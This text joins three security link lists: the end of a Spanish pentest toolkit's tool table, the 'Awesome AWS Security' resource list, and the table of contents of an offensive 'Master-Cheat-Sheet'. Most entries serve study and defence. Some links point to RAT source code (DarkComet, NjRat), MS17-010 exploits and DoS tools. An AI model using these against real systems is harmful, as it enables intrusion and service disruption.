| []() | []() | [johnny](https://openwall.info/wiki/john/johnny) |
| []() | []() | [ophcrack](https://ophcrack.sourceforge.io/) |
| []() | []() | [patator](https://github.com/lanjelot/patator) |
| []() | []() | [pwdump](https://www.openwall.com/passwords/windows-pwdump) |
| []() | []() | [rainbowcrack](https://project-rainbowcrack.com/) |
| []() | []() | [thc-hydra](https://github.com/maaaaz/thc-hydra-windows/) |
| []() | []() | [Crunch](https://github.com/shadwork/Windows-Crunch/) |
| []() | []() | [cupp](https://github.com/Mebus/cupp) |
| 7 - Criptografia y Hashing | 8 - Explotacion de Vulnerabilidades | 9 - MITM - Envenenamiento |
|--------------------------------|---------------------------------------|---------------------------------|
| [Hash Suite](https://hashsuite.openwall.net/) | [Commix](https://github.com/commixproject/commix) | [Ettercap-ng](https://sourceforge.net/projects/ettercap/files/unofficial%20binaries/windows/) |
| [Hash Identifier](https://sourceforge.net/projects/hashidentifier/) | [CrackMapExecWin](https://github.com/maaaaz/CrackMapExecWin) | [evil-foca](https://www.elevenpaths.com/es/labstools/evil-focasp/index.html) |
| [HashTools](https://www.binaryfortress.com/HashTools/ChangeLog/) | [mimikatz](https://github.com/gentilkiwi/mimikatz/) | [mitmproxy](https://docs.mitmproxy.org/stable/overview-tools/) |
| []() | [PowerMemory](https://github.com/giMini/PowerMemory) | [arpspoof](https://github.com/alandau/arpspoof) |
| []() | [PrivExchange](https://github.com/dirkjanm/PrivExchange) | [dnschef](https://github.com/iphelix/dnschef) |
| []() | [SessionGopher](https://github.com/Arvanaghi/SessionGopher) | [tmac](https://technitium.com/tmac/) |
| []() | [DAVOSET (DoS)](https://github.com/MustLive/DAVOSET) | []() |
| []() | [LOIC (DoS)](https://github.com/NewEraCracker/LOIC) | []() |
| []() | [evil-winrm](https://github.com/Hackplayers/evil-winrm) | []() |
| []() | [impacket](https://github.com/SecureAuthCorp/impacket) | []() |
| []() | [metasploit-framework](https://github.com/rapid7/metasploit-framework) | []() |
| []() | [nishang](https://github.com/samratashok/nishang) | []() |
| []() | [p0wnedShell](https://github.com/Cn33liz/p0wnedShell) | []() |
| []() | [PowerSploit](https://github.com/PowerShellMafia/PowerSploit) | []() |
| []() | [SysWhispers](https://github.com/jthuraisamy/SysWhispers) | []() |
| []() | [uacamola](https://github.com/ElevenPaths/uac-a-mola/tree/master/uacamola) | []() |
| []() | [AutoBlue-MS17-010 (exploit)](https://github.com/3ndG4me/AutoBlue-MS17-010) | []() |
| []() | [MS17-010 (exploit)](https://github.com/worawit/MS17-010) | []() |
| []() | []() | []() |
| []() | []() | []() |
| 10 - Networking - | 11 - Diccionarios - | 12 - RAT - |
|--------------------------------|----------------------------------|---------------------------------|
| [netcat](https://crysol.org/recipe/2005-10-10/netcat-la-navaja-suiza-de-tcp-ip.html#.X0qrOO9xfyY) | [fuzdb](https://github.com/fuzzdb-project/) | [DarkComet](https://github.com/zxo2004/DarkComet-RAT-5.3.1) |
| [socat](https://sourceforge.net/projects/unix-utils/files/socat/1.7.3.2/) | [SecList](https://github.com/danielmiessler/SecLists) | [NjRat](https://github.com/AliBawazeEer/RAT-NjRat-0.7d-modded-source-code) |
| [tcping](https://www.elifulkerson.com/projects/tcping.php) | []() | []() |
| [tcprelay](https://tcpreplay.appneta.com/) | []() | []() |
| [tcptrace](http://www.tcptrace.org/) | []() | []() |
| [tcptunnel](http://www.vakuumverpackt.de/tcptunnel/) | []() | []() |
| [tcpview](https://docs.microsoft.com/en-us/sysinternals/downloads/tcpview) | []() | []() |
| [Wireshark](https://www.wireshark.org/) | []() | []() |
| []() | []() | []() |
| []() | []() | []() |
| []() | []() | []() |
| []() | []() | []() |
| []() | []() | []() |
| []() | []() | []() |
| []() | []() | []() |
| []() | []() | []() |
| []() | []() | []() |
| []() | []() | []() |
| []() | []() | []() |
| []() | []() | []() |
| []() | []() | []() |
| []() | []() | []() |
| []() | []() | []() |
| []() | []() | []() |
| []() | []() | []() |
| []() | []() | []() |
| []() | []() | []() |
| []() | []() | []() |
## Wiki 📖
[Go to wiki!!](https://github.com/Relativity-Environment/Relativity_Scripts/wiki)
## Autor ✒️
* **Victor M. Gil** - *Trabajo Inicial* - ([email protected])
## Licencia 📄
Este proyecto está bajo la Licencia (GNU) - mira el archivo [LICENSE](LICENSE) para detalles
|
# Awesome AWS Security [![Awesome](https://awesome.re/badge.svg)](https://awesome.re)
A common curated list of links, references, books videos, tutorials (Free or
Paid), Exploit, CTFs, Hacking Practices etc. which are obviously related to AWS Security.
_List inspired by the [awesome](https://github.com/sindresorhus/awesome) list thing._
![Awesome AWS Security](awesome-aws-security.png)
## Table of Contents
[1. AWS Whitepapers](#AWS-Whitepapers)
[2. Books](#Books)
[3. Videos](#Videos)
[4. Online Tutorials/Blogs/Presentations](#Online-TutorialsBlogsPresentations)
[5. Online Courses (Paid/Free)](#Online-Courses-PaidFree)
[6. Tools of Trade](#Tools-of-Trade)
[7. Security Practice and CTFs](#Security-Practice-and-CTFs)
[8. AWS Security Bulleting Important Issues](#AWS-Security-Bulleting-Important-Issues)
[9. AWS Security Breaches](#AWS-Security-Breaches)
[10. Contributors](#Contributors)
## AWS Whitepapers
AWS has awesome lists of whitepapers related to AWS Security. We are adding few important one here. You can anytime check more for updated or new security whitepapers [here](https://aws.amazon.com/security/security-learning/?whitepapers-main.sort-by=item.additionalFields.sortDate&whitepapers-main.sort-order=desc)
And don't forget to **bookmark AWS Security bulletin** for new vulnerabilities news from [here](https://aws.amazon.com/security/security-bulletins/)
1. [AWS Overview](https://d1.awsstatic.com/whitepapers/aws-overview.pdf) - One of the important whitepaper to understand an overview of AWS
2. [Introduction to AWS Security Whitepaper](https://docs.aws.amazon.com/whitepapers/latest/introduction-aws-security/introduction-aws-security.pdf)
3. [AWS Well-Architected Security Pillar](https://docs.aws.amazon.com/wellarchitected/latest/security-pillar/wellarchitected-security-pillar.pdf)
4. [Introduction to Security By Design](https://d1.awsstatic.com/whitepapers/compliance/Intro_to_Security_by_Design.pdf)
5. [AWS Well Architected Framework](https://d1.awsstatic.com/whitepapers/architecture/AWS_Well-Architected_Framework.pdf)
6. [AWS Risk And Compliance Whitepaper](https://d0.awsstatic.com/whitepapers/compliance/AWS_Risk_and_Compliance_Whitepaper.pdf)
7. [AWS Security Checklist](https://d1.awsstatic.com/whitepapers/Security/AWS_Security_Checklist.pdf)
8. [AWS HIPAA Compliance Whitepaper](https://d0.awsstatic.com/whitepapers/compliance/AWS_HIPAA_Compliance_Whitepaper.pdf)
9. [AWS Cloud Adoption Framework](https://d1.awsstatic.com/whitepapers/aws_cloud_adoption_framework.pdf)
10. [AWS Auditing Security Checklist](https://d1.awsstatic.com/whitepapers/compliance/AWS_Auditing_Security_Checklist.pdf)
11. [AWS CIS Foundation benchmark](https://d1.awsstatic.com/whitepapers/compliance/AWS_CIS_Foundations_Benchmark.pdf)
12. [AWS Security Incident Response](https://d1.awsstatic.com/whitepapers/aws_security_incident_response.pdf)
13. [Overview of AWS Lambda Security](https://d1.awsstatic.com/whitepapers/Overview-AWS-Lambda-Security.pdf)
14. [AWS KMS Best Practices](https://d1.awsstatic.com/whitepapers/aws-kms-best-practices.pdf)
15. [Encrypting File Data with Amazon Elastic File System](https://d1.awsstatic.com/whitepapers/Security/amazon-efs-encrypted-filesystems.pdf)
16. [Security of AWS CloudHSM backups](https://d1.awsstatic.com/whitepapers/Security/security-of-aws-cloudhsm-backups.pdf)
17. [Security overview of AWS Lambda](https://aws.amazon.com/lambda/security-overview-of-aws-lambda/)
18. [NIST Cybersecurity Framework in the AWS cloud](https://d0.awsstatic.com/whitepapers/compliance/NIST_Cybersecurity_Framework_CSF.pdf)
19. [NIST 800-144 Security and Privacy in Public Cloud Computing](https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-144.pdf)
20. [Security at the Edge: Core Principles](https://d1.awsstatic.com/whitepapers/Security/security-at-the-edge.pdf)
21. [AWS KMS Best Practices](https://d0.awsstatic.com/whitepapers/aws-kms-best-practices.pdf)
22. [Security Overview of AWS Fargate](https://d1.awsstatic.com/whitepapers/AWS_Fargate_Security_Overview_Whitepaper.pdf)
## Books
1. [Hands-On AWS Penetration Testing with Kali Linux by PackT](https://www.packtpub.com/virtualization-and-cloud/hands-aws-penetration-testing-kali-linux)
2. [Mastering AWS Security by PackT](https://www.packtpub.com/in/virtualization-and-cloud/mastering-aws-security)
3. [Security Best Practices on AWS by PackT](https://www.packtpub.com/in/virtualization-and-cloud/aws-security-best-practices-aws)
4. [Cloud Security Automation](https://www.packtpub.com/in/networking-and-servers/cloud-security-automation)
5. [AWS Automation Cookbook](https://www.packtpub.com/in/virtualization-and-cloud/aws-automation-cookbook)
6. [AWS Lambda Security Best Practices - pdf](http://www.aliencoders.org/wp-content/uploads/2020/01/AWS-Lambda-Security-eBook-1.pdf) - It's published by Puresec and it has a good overview on AWS Lambda Security Best Practices which we should follow
7. [AWS Security by Manning](https://www.manning.com/books/aws-security) - Very nice book in Progress, yet to release.
8. [Securing DevOps](https://www.manning.com/books/securing-devops) - A book which has real-world examples for Cloud Security. Must read book for any Cloud Security Professionals.
9. [Serverless Security](https://ServerlessSecurityBook.com) - An Apress book that discusses serverless security on AWS, Azure and Google Cloud.
10. [AWS Security Cookbook](https://www.packtpub.com/product/aws-security-cookbook/9781838826253)
11. [Practical Guide to Security in the AWS Cloud by SANS and sponsored by AWS Marketplace - pdf](https://pages.awscloud.com/rs/112-TZM-766/images/Cloud%20Security%20Practical%20Guide%20to%20Security%20in%20the%20AWS%20Cloud.pdf)
12. [CSA Guide to Cloud Computing by Sungress](https://www.oreilly.com/library/view/csa-guide-to/9780124201255/)
13. [Practical Cloud Security by O'reilly](https://www.oreilly.com/library/view/practical-cloud-security/9781492037507/)
14. [Effective IAM for AWS](https://www.effectiveiam.com)
## Videos
1. [The fundamentals of AWS Security](https://www.youtube.com/watch?v=-ObImxw1PmI) - Youtube
2. [AWS Security by Design](https://www.youtube.com/watch?v=I1SwoKxB13c) - Youtube
3. [Account Security with IAM](https://www.youtube.com/watch?v=9CKsX6MOPDQ) - Youtube
4. [AWS re:Inforce 2019 Security Best Practices](https://www.youtube.com/watch?v=u6BCVkXkPnM) - Youtube
5. [AWS Cloud Security Playlist](https://www.youtube.com/watch?v=N4DdqAkeqD4&list=PLxzKY3wu0_FL4VDfuCohtikXTQNTvKQVX) - Youtube
6. [A cloud security architecture workshop by RSA](https://www.youtube.com/watch?v=4TxvqZFMaoA) - Youtube
7. [AWS Cloud Security](https://www.oreilly.com/library/view/aws-cloud-security/9780135174784/) - Oreilly
8. [Introduction to AWS Security Hub](https://www.youtube.com/watch?v=o0NDi01YPXs) - Youtube
9. [Solution for flaws.cloud AWS Security Challenge](https://www.youtube.com/watch?v=VDptLO9XYbU&list=PLRTsCutScZnzo3uV_79Dur73kqskfaTMS) - Youtube Playlist
10. [AWS Security Best Practice: Well-Architected way](https://www.youtube.com/watch?v=u6BCVkXkPnM) - Youtube
11. [Hands-On With AWS Security Best Practices](https://www.youtube.com/watch?v=dabbsZ_sDX0)
12. [AWS re:Invent 2020: Security at scale: How Goldman Sachs manages network and access control](https://www.youtube.com/watch?v=5cnob8HIswY)
## Online Tutorials/Blogs/Presentations
1. [AWS Security official blog](https://aws.amazon.com/blogs/security/)
2. [AWS in Plain English](https://expeditedsecurity.com/aws-in-plain-english/)
3. [Why the CIA trusts AWS](https://mediatemple.net/blog/tips/aws-building-blocks/)
4. [Fundamentals of AWS Security](https://www.slideshare.net/AmazonWebServices/fundamentals-of-aws-security) - Presentation from AWS
5. [AWS Security primer](https://cloudonaut.io/aws-security-primer/) - Nice overview and quick run through AWS Security resources.
6. [AWS Security Blog](https://aws.amazon.com/blogs/security/)
7. [How a whitehat hacker earned $1500 in 15 minutes due to AWS S3 misconfiguration](https://medium.com/@protector47/how-i-earned-1-500-in-just-15-mins-due-to-amazon-s3-bucket-misconfiguration-953b28242f95) - It was fun going through the blog. You can learn from this article too.
8. [A deep dive into AWS S3 access control](https://labs.detectify.com/2017/07/13/a-deep-dive-into-aws-s3-access-controls-taking-full-control-over-your-assets/) - It will give a very good grip on how S3 buckets can be exploited. Lengthy but worth to go through.
9. [How Federico hacked a whole EC2 network during a penetration test](https://www.secsignal.org/en/news/how-i-hacked-a-whole-ec2-network-during-a-penetration-test/)
10. [A short blog on hacking AWS](https://www.devopsgroup.com/blog/hacking-aws-blog/) - Examples are based on cloudgoat.
11. [S3 security is flawed by design](https://www.upguard.com/blog/s3-security-is-flawed-by-design) - This article will show you why you need to be extra careful when using AWS S3.
12. [51 Tips for Security AWS(pdf)](https://www.mcafee.com/enterprise/en-us/assets/skyhigh/white-papers/wp-definitive-guide-to-aws-ebook.pdf) - McAfee
13. [The role of API gateways in API security](https://dzone.com/articles/the-role-of-api-gateways-in-api-security)
14. [Finding SSRF via HTML Injection inside a PDF file on AWS EC2](https://blog.appsecco.com/finding-ssrf-via-html-injection-inside-a-pdf-file-on-aws-ec2-214cc5ec5d90)
15. [Getting shell and data access in AWS by chaining vulnerabilities](https://blog.appsecco.com/getting-shell-and-data-access-in-aws-by-chaining-vulnerabilities-7630fa57c7ed)
16. [Hacking Serverless Runtimes - Blackhat2017](https://www.blackhat.com/docs/us-17/wednesday/us-17-Krug-Hacking-Severless-Runtimes.pdf)
17. [Detailed blog on ConsoleMe: A Central Control Plane for AWS Permissions and Access by Netflix](https://netflixtechblog.com/consoleme-a-central-control-plane-for-aws-permissions-and-access-fd09afdd60a8)
18. [Strengthen the security of sensitive data stored in Amazon S3 by using additional AWS services](https://aws.amazon.com/blogs/security/strengthen-the-security-of-sensitive-data-stored-in-amazon-s3-by-using-additional-aws-services/)
19. [Use IMDSv2 instead: Defense in depth](https://aws.amazon.com/blogs/security/defense-in-depth-open-firewalls-reverse-proxies-ssrf-vulnerabilities-ec2-instance-metadata-service/
)
20. [Managing permissions with grants in AWS Key Management Service](https://aws.amazon.com/blogs/security/managing-permissions-with-grants-in-aws-key-management-service/)
21. [AWS IAM Exploitation](https://sra.io/blog/aws-iam-exploitation/)
22. [S3 Pentest by Rhino Security Labs](https://rhinosecuritylabs.com/penetration-testing/penetration-testing-aws-storage/)
23. [How an Attacker Could Use Instance Metadata to Breach Your App in AWS](https://www.mcafee.com/blogs/enterprise/cloud-security/how-an-attacker-could-use-instance-metadata-to-breach-your-app-in-aws/)
24. [Orca Security Research Team Discovers AWS CloudFormation Vulnerability](https://orca.security/resources/blog/aws-cloudformation-vulnerability/)
25. [Orca Security Research Team Discovers AWS Glue Vulnerability](https://orca.security/resources/blog/aws-glue-vulnerability/)
26. [How I Discovered Thousands of Open Databases on AWS](https://infosecwriteups.com/how-i-discovered-thousands-of-open-databases-on-aws-764729aa7f32)
27. [CVE-2022-25165: Privilege Escalation to SYSTEM in AWS VPN Client](https://rhinosecuritylabs.com/aws/cve-2022-25165-aws-vpn-client/)
28. [Downloading and Exploring AWS EBS Snapshots](https://rhinosecuritylabs.com/aws/exploring-aws-ebs-snapshots/)
29. [Weaponizing AWS ECS Task Definitions to Steal Credentials From Running Containers](https://rhinosecuritylabs.com/aws/weaponizing-ecs-task-definitions-steal-credentials-running-containers/)
30. [Good Read on AWS IAM Privilege Escalation – Methods and Mitigation](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/)
31. [One more on IAM Privilege Escalation](https://payatu.com/blog/mayank.arora/iam_privilege_escalation_attack)
32. *[A very good repo for learning IAM based vulnerabilities](https://github.com/BishopFox/iam-vulnerable)
33. [AWS Penetration Testing: Step by step guide](https://www.hackthebox.com/blog/aws-pentesting-guide)
## Online Courses (Paid/Free)
1. [AWS Fundamentals: Address Security Risks](https://www.coursera.org/learn/aws-fundamentals-addressing-security-risk) - Coursera
2. [Cloud Computing Security](https://www.coursera.org/learn/cloud-computing-security) - Coursera
3. [AWS: Getting started with Cloud Security](https://www.edx.org/course/aws-getting-started-with-cloud-security) - EdX
4. [AWS Certified Security Specialty](https://www.udemy.com/course/aws-certified-security-specialty/) - Udemy by Zeal Vora
5. [AWS Certified Security Specialty](https://acloud.guru/learn/aws-certified-security-specialty) - From Acloud.guru
6. [AWS Certified Security Specialty](https://www.udemy.com/course/ultimate-aws-certified-security-specialty/) - Udemy by Stephan Maarek
7. [AWS Certified Security Specialty](https://www.whizlabs.com/aws-certified-security-specialty/) - From WhizLabs
8. [AWS Advanced Security](https://www.udemy.com/course/aws-advanced-security/) - Udemy
9. [AWS for Architects: Advanced Security](https://www.linkedin.com/learning/aws-for-architects-advanced-security/) - Linkedin Learn by Lynn Langit
10. [Practical Event Driven Security with AWS](https://acloud.guru/learn/practical-event-driven-security-with-aws) - Acloud.guru
11. [Learning Path for AWS Security](https://learn.acloud.guru/learning-path/aws-security) - Nicely designed the learning path who wants to be an AWS Security Experts from Acloud.guru
12. [Cloud Hacking course](https://www.notsosecure.com/hacking-training/cloud-hacking/) - From NotSoSercure
13. [Breaking and Pwning Apps and Servers in AWS and Azure](https://github.com/appsecco/breaking-and-pwning-apps-and-servers-aws-azure-training) - Previously an instructor led training now released as free and open source courseware for Cloud Pentesters
14. [AWS Skill Builder platform security learning plan](https://explore.skillbuilder.aws/learn/public/learning_plan/view/91/security-learning-plan) - AWS SkillBuilder
15. [Cloud Security: AWS Edition Bootcamp by Pentester Academy](https://bootcamps.pentesteracademy.com/course/cloud-security-aws-on-demand) - From Pentester Academy
16. [Cloud Security BootCamp by Kaizenteq](www.cloudsecuritybootcamp.com) - Monthly FREE Cloud Security Bootcamps From Kaizenteq
## Tools of Trade
1. [AWS Security Products - Official](https://aws.amazon.com/products/security/) - Few Important tools that you should consider are:
* 1.1 **AWS IAM:** AWS Identity and Access Management (IAM) enables you to manage access to AWS services and resources securely
* 1.2 **CloudWatch:** CloudWatch is the AWS monitoring tool
* 1.3 **CloudTrail:** AWS CloudTrail is a service that enables governance, compliance, operational auditing, and risk auditing of your AWS account
* 1.4 **AWS Inspector:** AWS inspector is a security assessment service that does vulnerability and best-practice scanning for AWS applications
* 1.5 **Amazon GuardDuty:** GuardDuty is a managed threat detection service that is simple to deploy, and scales with your infrastructure
* 1.6 **AWS KMS:** AWS KMS is a secure and resilient service that uses hardware security modules that have been validated under FIPS 140-2
* 1.7 **AWS Shield:** AWS Shield is a managed DDoS protection service. AWS Shield can protect EC2, Load balancers, CloudFront, Global Accelerator, and Route 53 resources
* 1.8 **AWS Trusted Advisor:** AWS Trusted Advisor is an online tool that provides you real time guidance to help you provision your resources following AWS best practices
* 1.9 **AWS Config:** AWS Config is a service that enables you to assess, audit, and evaluate the configurations of your AWS resources
* 1.10 **Security Hub:** AWS Security Hub gives you a comprehensive view of your high-priority security alerts and security posture across your AWS accounts
* 1.11 **AWS WAF:** AWS WAF is a web application firewall that helps protect your web applications or APIs against common web exploits that may affect availability, compromise security, or consume excessive resources
* 1.12 **AWS Macie:** Macie is all about protecting data. It is a machine learning service that watches data access trends and finds anomalies to spot data leaks and unauthorized data access.
* 1.13 **AWS Detective:** Amazon Detective automatically collects log data from your AWS resources and uses machine learning, statistical analysis, and graph theory to build a linked set of data that enables you to easily conduct faster and more efficient security investigations.
* 1.14 **AWS Conformance Packs:** A conformance pack is a collection of AWS Config rules and remediation actions that can be easily deployed as a single entity in an account and a Region or across an organization in AWS Organizations. [conformance packs on github](https://github.com/awslabs/aws-config-rules/tree/master/aws-config-conformance-packs)
2. [Arsenal of AWS Security Tools](https://github.com/toniblyx/my-arsenal-of-aws-security-tools) - Collection of all security category tools and products
3. [AWS Security Automation](https://github.com/awslabs/aws-security-automation) - Collection of scripts and resources for DevSecOps and Automated Incident Response Security
4. [truffleHog](https://github.com/dxa4481/truffleHog) - Searches through git repositories for high entropy strings and secrets, digging deep into commit history
5. [gitleaks](https://github.com/zricethezav/gitleaks) - Audit git repos for secrets
6. [AWS Security Benchmark](https://github.com/awslabs/aws-security-benchmark) - Open source demos, concept and guidance related to the AWS CIS Foundation framework.
7. [S3 Inspector](https://github.com/kromtech/s3-inspector) - Tool to check AWS S3 bucket permissions
8. [ScoutSuite](https://github.com/nccgroup/ScoutSuite) - Multi-Cloud Security Auditing Tool
9. [Prowler](https://github.com/toniblyx/prowler) - AWS Security Best Practices Assessment, Auditing, Hardening and Forensics Readiness Tool.
10. [AWS Vault](https://github.com/99designs/aws-vault) - A vault for securely storing and accessing AWS credentials in development environments
11. [AWS PWN](https://github.com/dagrz/aws_pwn) - A collection of AWS penetration testing junk
12. [Pacu](https://github.com/RhinoSecurityLabs/pacu) - AWS Penetration Testing Toolkits
13. [Zeus](https://github.com/DenizParlak/Zeus) - AWS Auditing and Hardening tool
14. [Cloud Mapper](https://github.com/duo-labs/cloudmapper) - Analyze your AWS environments (Python)
15. [ConsoleMe](https://github.com/Netflix/consoleme) - A Central Control Plane for AWS Permissions and Access
16. [AWS Firewall Factory](https://github.com/globaldatanet/aws-firewall-factory) - Deploy, update, and stage your WAFs while managing them centrally via FMS.
17. [AWS Pentesting/Red Team Methodology - by hacktricks](https://cloud.hacktricks.xyz/pentesting-cloud/aws-pentesting) - A Collection for AWS environment penetration testing methodology.
18. [AWS Pentesting/Red Team Methodology - by hackingthe.cloud](https://hackingthe.cloud/aws/general-knowledge/aws_organizations_defaults/) - A collection of attacks/tactics/techniques that can use by offensive security professionals during cloud exploitation.
## Security Practices and CTFs
1. [AWS Well Architected Security Labs](https://wellarchitectedlabs.com/security/)
2. [Flaws to learn common mistakes in AWS through challenge](http://flaws.cloud/)
3. [Flaws2 focuses on AWS security concepts through various challenge levels](http://flaws2.cloud/)
4. [CloudGoat By Rhino Security Labs](https://github.com/RhinoSecurityLabs/cloudgoat) - Vulnerable by Design AWS infrastructure setup tool
5. [OWASP ServerlessGoat](https://github.com/OWASP/Serverless-Goat) - OWASP ServerlessGoat is a deliberately insecure realistic AWS Lambda serverless application maintained by OWASP for educational purposes.
6. [OWASP WrongSecrets](https://github.com/commjoen/wrongsecrets) - OWASP WrongSecrets is a vulnerable app which shows you how to not store secrets. It covers code, Docker, Kubernetes, and AWS cloud bad practices.
7. [AWS S3 CTF Challenges with solutions](https://n0j.github.io/2017/10/02/aws-s3-ctf.html)
8. [AWS CTF with practical scenario](https://r00tz-ctf.awssecworkshops.com/)
9. [Breaking and Pwning Apps and Servers on AWS and Azure by AppSecCo](https://github.com/appsecco/breaking-and-pwning-apps-and-servers-aws-azure-training) - The training covers a multitude of scenarios taken from our vulnerability assessment, penetration testing and OSINT engagements which take the student through the journey of discovery, identification and exploitation of security weaknesses, misconfigurations and poor programming practices that can lead to complete compromise of the cloud infrastructure.
10. [AWS Workshop official](https://awsworkshop.io/) - This is not exactly security part, but would be helpful to understand AWS with this workshop examples.
11. [AWS Security Workshops](https://awssecworkshops.com/) by AWS
12. [ThreatModel for Amazon S3](https://github.com/trustoncloud/threatmodel-for-aws-s3) - Library of all the attack scenarios on Amazon S3 and how to mitigate them, following a risk-based approach
13. [AWS Cloud Quest: Security Role](https://explore.skillbuilder.aws/learn/course/external/view/elearning/7636/cloud-quest)
14. [AWS Jam Journey: Security](https://explore.skillbuilder.aws/learn/course/external/view/elearning/9284/aws-jam-journey-security)
15. [TryHackMe: Attacking and Defending AWS](https://resources.tryhackme.com/attacking-and-defending-aws)
16. [Free AWS Security Labs](https://pentesting.cloud/)
17. [Black Sky Cloud Labs from HTB](https://www.hackthebox.com/business/professional-labs/cloud-labs-blacksky)
## AWS Security Bulletin Important Issues
1. [Container Networking Security Issue ([CVE-2020-8558])](https://nvd.nist.gov/vuln/detail/CVE-2020-8558) (This issue may allow containers running on the same host, or adjacent hosts (hosts running in the same LAN or layer 2 domain), to reach TCP and UDP services bound to localhost (127.0.0.1))
2. [Minimum Version of TLS 1.2 Required for FIPS Endpoints by March 31, 2021](https://aws.amazon.com/security/security-bulletins/AWS-2020-001/)
3. [Unencrypted md5 plaintext hash in metadata in AWS S3 Crypto SDK for golang](https://github.com/google/security-research/security/advisories/GHSA-76wf-9vgp-pj7w)
4. [CBC padding oracle issue in AWS S3 Crypto SDK for golang](https://github.com/google/security-research/security/advisories/GHSA-f5pg-7wfw-84q9) : [CVE-2020-8911](https://nvd.nist.gov/vuln/detail/CVE-2020-8911)
5. [In-band key negotiation issue in AWS S3 Crypto SDK for golang](https://github.com/google/security-research/security/advisories/GHSA-7f33-f4f5-xwgw) : [CVE-2020-8912](https://nvd.nist.gov/vuln/detail/CVE-2020-8912)
6. [CVE-2018-15869](https://nvd.nist.gov/vuln/detail/CVE-2018-15869): An Amazon Web Services (AWS) developer who does not specify the --owners flag when describing images via AWS CLI, and therefore not properly validating source software per AWS recommended security best practices, may unintentionally load an undesired and potentially malicious Amazon Machine Image (AMI) from the uncurated public community AMI catalog.
7. [How a Security Researcher found 1000s of open databases on AWS](https://infosecwriteups.com/how-i-discovered-thousands-of-open-databases-on-aws-764729aa7f32)
## AWS Security Breaches
1. [AWS Security breaches - 2017](https://www.sumologic.com/blog/aws-security-breaches-2017/)
2. [200 million voters data leak](https://www.skyhighnetworks.com/cloud-security-blog/latest-voter-data-leak-is-a-lesson-in-aws-security/) - A lesson in AWS Security
3. [Imperva blames data breach on Stolen AWS API keys](https://www.zdnet.com/article/imperva-blames-data-breach-on-stolen-aws-api-key/)
4. [Tesla's Amazon cloud account was hacked and used to mine cryptocurrency](https://www.businessinsider.in/finance/teslas-amazon-cloud-account-was-hacked-and-used-to-mine-cryptocurrency/articleshow/63003345.cms)
5. [10 worst Amazon S3 breaches](https://businessinsights.bitdefender.com/worst-amazon-breaches)
6. [Lion Air the Latest to Get Tripped Up by Misconfigured AWS S3](https://www.darkreading.com/attacks-breaches/lion-air-the-latest-to-get-tripped-up-by-misconfigured-aws-s3-/d/d-id/1335864)
7. [Online Fashion App 21 buttons Exposes Financial Records of Top European Influencers due to S3 misconfiguration](https://www.vpnmentor.com/blog/report-21-buttons-breach/)
8. [Capital One Cloud data breach due to S3 misconfiguration](https://rhinosecuritylabs.com/aws/capital-one-cloud_breach_s3-cloudgoat/)
9. [Online Fashion App 21 buttons Exposes Financial Records of Top European Influencers](https://www.vpnmentor.com/blog/report-21-buttons-breach/)
10. [Utah COVID-19 testing service exposes 50,000 patients’ photo IDs, personal info on the web](https://www.comparitech.com/blog/information-security/utah-covid-test-center-leak/)
11. [US municipalities suffer data breach due to misconfigured Amazon S3 buckets](https://www.securitymagazine.com/articles/95704-us-municipalities-suffer-data-breach-due-to-misconfigured-amazon-s3-buckets)
## AWS Security Podcast/Newsletter
1. [Cloud Security Podcast - YouTube](https://www.youtube.com/@CloudSecurityPodcast/videos) - Weekly Interviews with Cloud Security Professionals on AWS, Azure, GCP Security for Blue Teams & Red Teams
2. [Cloud Security Newsletter](https://www.cloudsecuritynewsletter.com/) - Weekly Cloud Security Nuggets in your inbox
## Contributors
[Please refer the guidelines at contribute.md for details](Contribute.md).
Thanks to the following folks who made contributions to this project.
**Get your name listed here**
[List of Contributors](https://github.com/jassics/awesome-aws-security/graphs/contributors)
|
# Master-Cheat-Sheet
* [General usefull Powershell Scripts](#General-usefull-Powershell-Scripts)
* [AMSI Bypass restriction Bypass](#AMSI-Bypass-restriction-Bypass)
* [Payload Hosting](#Payload-Hosting)
* [Network Share Scanner](#Network-Share-Scanner)
* [Lateral Movement](#Lateral-Movement)
* [Reverse Shellz](#Reverse-Shellz)
* [POST Exploitation](#POST-Exploitation)
* [Pivot](#Pivot)
* [Backdoor finder](#Backdoor-finder)
* [Persistence on windows](#Persistence-on-windows)
* [Web Application Pentest](#Web-Application-Pentest)
* [Framework Discovery](#Framework-Discovery)
* [Framework Scanner / Exploitation](#Framework-Scanner-/-Exploitation)
* [Web Vulnerability Scanner / Burp Plugins](#Web-Vulnerability-Scanner-/-Burp-Plugins)
* [Network- / Service-level Vulnerability Scanner](#Network--/-Service--level-Vulnerability-Scanner)
* [Crawler](#Crawler)
* [Web Exploitation Tools](#Web-Exploitation-Tools)
* [Windows Privilege Escalation / Audit](#Windows-Privilege-Escalation-/-Audit)
* [T3 Enumeration](#T3-Enumeration)
* [Linux Privilege Escalation / Audit](#Linux-Privilege-Escalation-/-Audit)
* [Credential harvesting Windows Specific](#Credential-harvesting-Windows-Specific)
* [Credential harvesting Linux Specific](#Credential-harvesting-Linux-Specific)
* [Data Exfiltration - DNS/ICMP/Wifi Exfiltration](#Data-Exfiltration---DNS/ICMP/Wifi-Exfiltration)
* [Git Specific](#Git-Specific)
* [Reverse Engineering / decompiler](#Reverse-Engineering-/-decompiler)
* [Forensics](#Forensics)
* [Network Attacks](#Network-Attacks)
* [Specific MITM service Exploitation](#Specific-MITM-service-Exploitation)
* [Sniffing / Evaluation / Filtering](#Sniffing-/-Evaluation-/-Filtering)
* [Scanner / Exploitation-Frameworks / Automation](#Scanner-/-Exploitation-Frameworks-/-Automation)
* [Default Credential Scanner](#Default-Credential-Scanner)
* [Payload Generation / AV-Evasion / Malware Creation](#Payload-Generation-/-AV-Evasion-/-Malware-Creation)
* [Domain Finding / Subdomain Enumeration](#Domain-Finding-/-Subdomain-Enumeration)
* [Scanner network level](#Scanner)
* [Email Gathering](#Email-Gathering)
* [Domain Auth + Exploitation](#Domain-Auth-+-Exploitation)
* [Network service - Login Brute Force + Wordlist attacks](#Login-Brute-Force-+-Wordlist-attacks)
* [Command & Control Frameworks](#Command-&-Control-Frameworks)
* [Wifi Tools](#Wifi-Tools)
* [Raspberri PI Exploitation](#Raspberri-PI-Exploitation)
* [Social Engeneering](#Social-Engeneering)
* [Wordlists / Wordlist generators](#Wordlists-/-Wordlist-generators)
* [Obfuscation](#Obfuscation)
* [Source Code Analysis](#Source-Code-Analysis)
* [No category yet](#No-category-yet)
* [Industrial Control Systems](#Industrial-Control-Systems)
